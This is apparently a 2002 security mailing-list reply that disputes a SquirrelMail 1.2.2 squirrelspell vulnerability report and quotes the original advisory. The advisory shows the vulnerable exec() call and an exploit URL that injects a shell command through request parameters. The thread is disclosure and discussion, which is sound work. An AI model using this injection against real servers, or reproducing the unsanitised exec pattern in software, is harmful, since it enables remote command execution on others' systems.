I'm unable to repro on squirrelmail 1.2.2 + openbsd 2.9: Fatal error: Call to undefined function: sqspell_getlang() in /usr/local/www/htdocs/www2.axisproductions.com/webmail/plugins/squirrelspell/modules/check_me.mod.php on line 59 I'm also curious how much notice this person gave to the Squirrelmail development team to prepare a fix before releasing it to the world.. (same thought applies to the random cross-scripting vulnerability just sent out 3 seconds ago) On anothre note Squirrelmail 1.2.3 was released 01/21/02.. I was wondering if anyone has had the opportunity to test against it. This specific issue doesn't seem to have been noted in the changelog: http://www.squirrelmail.org/changelog.php Attempted to contact off-list earlier, but it seems the sender's mx is having problems. <appelast@bsquad.sm.pl>: 213.134.128.227 does not like recipient. Remote host said: 550 5.7.1 <appelast@bsquad.sm.pl>... Relaying denied Giving up on 213.134.128.227. On Thu, 24 Jan 2002 appelast@bsquad.sm.pl wrote: > > Squirrelmail remote execute commands bug > > Version Affected : > 1.2.2 > > Squirrelmail is a webmail system, which allows users to send, get, read > etc. > mails. It has some themes, plugins etc. One of the plugins has a very > interesting piece of code : > > from file check_me.mod.php : > > $sqspell_command = $SQSPELL_APP[$sqspell_use_app]; > ... > $floc = "$attachment_dir/$username_sqspell_data.txt"); > ... > exec ("cat $floc | $sqspell_command", $sqspell_output); > > > Everything should be ok, but where this page includes config files, > where > are defined $attachment_dir and others ? Answer: Nowhere. We can set up > variables $sqspell_command and $floc. Result ? We can execute any > command > of course as a http serwer owner. > > Exploit : > > host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wa > ll% > 20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=p > lik > > <appelast@bsquad.sm.pl> > >
